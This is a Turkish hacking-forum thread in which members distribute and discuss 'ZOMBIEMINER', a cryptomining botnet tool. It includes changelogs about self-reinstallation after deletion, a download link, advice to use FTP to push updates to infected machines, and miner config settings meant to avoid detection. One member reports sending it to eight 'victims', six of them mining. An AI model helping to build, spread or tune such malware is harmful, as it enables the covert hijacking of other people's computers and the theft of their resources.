Crypto Coin Mining Botnet: Zombi sistemlerde kendi coininizi kazın

Ælaska

Yeni üye
23 Ağu 2021
28
1
Miner'ın baslamasi icin exe'nin ilk acıldıktan sonra sistemin idle'a girmesi ya da yeniden baslatılması gerek

hiçbi fikrim yok sistemlerdeki islemcilere ve ne kadar süre açık kaldıklarına baglı

RandomX ana olarak CPU'lar için yazılmıs bir algoritma, GPU desteği eklemek hem modelden modele farklı olduğu için zahmetli hem de sonucunda cok kazanc getirmeyecek bir iş. Ama vaktim olduğunda eklemeye çalışırım.
denicem

zalim5811

Üye
3 Eki 2012
72
30
0.1.3
- EXE boşluklu bi hedefte buildlenirken çıkan hata çözüldü
- Miner silindiğinde kendini yeniden yerlestirmesinde bir hata vardi o çözüldü
- NiceHash isimlendirmesinde generic kısımlar varsa kaldırılıyor artık

drive dan indirebilirsiniz:

konigsrasse123

Yeni üye
24 Nis 2016
37
3
0.1.3

"Miner silindiğinde kendini yeniden yerlestirmesinde bir hata vardi o çözüldü" ben ftp sunucuya bağlamamıştım dosyayı bundan sonraki kurbanlara yeni bir build yapip mi yollamalıyım yolladığınız programın ilk versiyonunu kullanıyorum sistemde kendini silindikten sonra farklı biryere kaydediyor mudur? şuan yolladığım 8 kişiden 6 sı aktif olarak kazım yapıyor bugun 4.gün

zalim5811

Üye
3 Eki 2012
72
30
"Miner silindiğinde kendini yeniden yerlestirmesinde bir hata vardi o çözüldü" ben ftp sunucuya bağlamamıştım dosyayı bundan sonraki kurbanlara yeni bir build yapip mi yollamalıyım yolladığınız programın ilk versiyonunu kullanıyorum sistemde kendini silindikten sonra farklı biryere kaydediyor mudur? şuan yolladığım 8 kişiden 6 sı aktif olarak kazım yapıyor bugun 4.gün
İlk versiyonunda olanlara update gönderemeyecegin icin onlar bi sekilde silerse kendini yeniden yerlestiremeyecek miner. bundan sonrakilere yeni build yapıp göndermen lazım. ftp'nin de açılmasını tavsiye ediyorum. gpu destegini halletigimde update gonderebilmek icin.

0.1.3

ZOMBIEMINER – Google Диск

drive.google.com
drive.google.com
Genişletmek için tıkla ...
0.1.3'ü bir daha yükledim kucuk bi sorun vardı

Moderatör tarafında düzenlendi:

darkangell112

Yeni üye
14 Ara 2008
8
0
izmir
Merhaba, Ben 1.4V dosyasını çektim ve config dosyasını şu şekilde ayarladım. Bir sorun çıkarır mı? sadece gpu varken dahi denediğimde (kendi bilgisayarımda test ettim) ring olarak görünmüyordu.
"gpu_enabled": true,
"cpu_enabled": true,
"mine_allthetime": true,
"pause_on_task_manager": false,
"maximum_allowed_thread_percentage": 60,

"mine_for": 1000,
"sleep_for": 500,

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.